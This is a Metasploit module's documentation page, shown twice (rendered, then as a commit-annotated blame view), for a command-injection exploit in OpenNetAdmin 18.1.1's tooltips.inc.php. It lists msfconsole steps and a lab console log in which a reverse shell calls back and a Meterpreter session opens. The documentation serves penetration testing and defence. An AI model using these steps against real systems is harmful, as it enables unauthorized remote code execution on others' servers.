documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md

## Description

OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors.
This module exploits a command injection in OpenNetAdmin. The vulnerability exists on the `tooltips.inc.php` component, due to the insecure usage of the `shell_exec()` PHP function.

## Vulnerable Application

This module has been tested with [OpenNetAdmin 18.1.1](https://github.com/opennetadmin/ona/releases/tag/v18.1.1)

## Setup

https://github.com/opennetadmin/ona/wiki/Install

## Verification

Launch metasploit and set the appropriate options:
>
> * [ ]  Start `msfconsole`
> * [ ]  `use exploit/unix/webapp/opennetadmin_ping_cmd_injection`
> * [ ]  `set RHOSTS <rhosts>`
> * [ ]  `set LHOST <lhost>`
> * [ ]  `set VHOST <hostname>`
> * [ ]  `exploit`

## Options

**VHOST**

The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional.

## Scenarios

 Tested OpenNetAdmin 18.1.1 on Ubuntu 19.10 x64

```
msf5 > use exploit/unix/webapp/opennetadmin_ping_cmd_injection
msf5 exploit(opennetadmin_ping_cmd_injection) > set RHOSTS 172.16.172.152
RHOSTS => 172.16.172.152
msf5 exploit(opennetadmin_ping_cmd_injection) > set VHOST example.com
VHOST => example.com
msf5 exploit(opennetadmin_ping_cmd_injection) > set LHOST 172.16.172.1
LHOST => 172.16.172.1
msf5 exploit(opennetadmin_ping_cmd_injection) > exploit
[*] Started reverse TCP handler on 172.16.172.1:4444
[*] Exploiting...
[*] Sending stage (3021284 bytes) to 172.16.172.152
[*] Meterpreter session 1 opened (172.16.172.1:4444 -> 172.16.172.152:38590) at 2019-12-10 02:38:52 +0300
[*] Sending stage (3021284 bytes) to 172.16.172.152
[*] Command Stager progress - 100.12% done (810/809 bytes)

meterpreter >
```
Added Module Documentation 2019-12-11 21:08:27 +03:00			`## Description`

			`OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors.`
Update and rename documentation/modules/exploit/linux/http/opennetadmin_ping_cmd_injection.md to documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md 2019-12-14 16:33:13 +03:00			This module exploits a command injection in OpenNetAdmin. The vulnerability exists on the `tooltips.inc.php` component, due to the insecure usage of the `shell_exec()` PHP function.
Added Module Documentation 2019-12-11 21:08:27 +03:00
			`## Vulnerable Application`

			`This module has been tested with [OpenNetAdmin 18.1.1](https://github.com/opennetadmin/ona/releases/tag/v18.1.1)`

			`## Setup`

			`https://github.com/opennetadmin/ona/wiki/Install`

			`## Verification`

spelling fixes on docs 2023-10-10 14:46:18 -04:00			`Launch metasploit and set the appropriate options:`
Added Module Documentation 2019-12-11 21:08:27 +03:00			`>`
			> * [ ] Start `msfconsole`
Update opennetadmin_ping_cmd_injection.md 2020-02-21 04:14:21 +03:00			> * [ ] `use exploit/unix/webapp/opennetadmin_ping_cmd_injection`
Added Module Documentation 2019-12-11 21:08:27 +03:00			> * [ ] `set RHOSTS <rhosts>`
			> * [ ] `set LHOST <lhost>`
			> * [ ] `set VHOST <hostname>`
			> * [ ] `exploit`

			`## Options`

			`VHOST`

			`The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional.`

			`## Scenarios`

			`Tested OpenNetAdmin 18.1.1 on Ubuntu 19.10 x64`

			```
Update opennetadmin_ping_cmd_injection.md 2020-02-21 04:14:21 +03:00			`msf5 > use exploit/unix/webapp/opennetadmin_ping_cmd_injection`
Added Module Documentation 2019-12-11 21:08:27 +03:00			`msf5 exploit(opennetadmin_ping_cmd_injection) > set RHOSTS 172.16.172.152`
			`RHOSTS => 172.16.172.152`
			`msf5 exploit(opennetadmin_ping_cmd_injection) > set VHOST example.com`
			`VHOST => example.com`
			`msf5 exploit(opennetadmin_ping_cmd_injection) > set LHOST 172.16.172.1`
			`LHOST => 172.16.172.1`
			`msf5 exploit(opennetadmin_ping_cmd_injection) > exploit`
			`[*] Started reverse TCP handler on 172.16.172.1:4444`
			`[*] Exploiting...`
			`[*] Sending stage (3021284 bytes) to 172.16.172.152`
			`[*] Meterpreter session 1 opened (172.16.172.1:4444 -> 172.16.172.152:38590) at 2019-12-10 02:38:52 +0300`
			`[*] Sending stage (3021284 bytes) to 172.16.172.152`
			`[*] Command Stager progress - 100.12% done (810/809 bytes)`

			`meterpreter >`
			```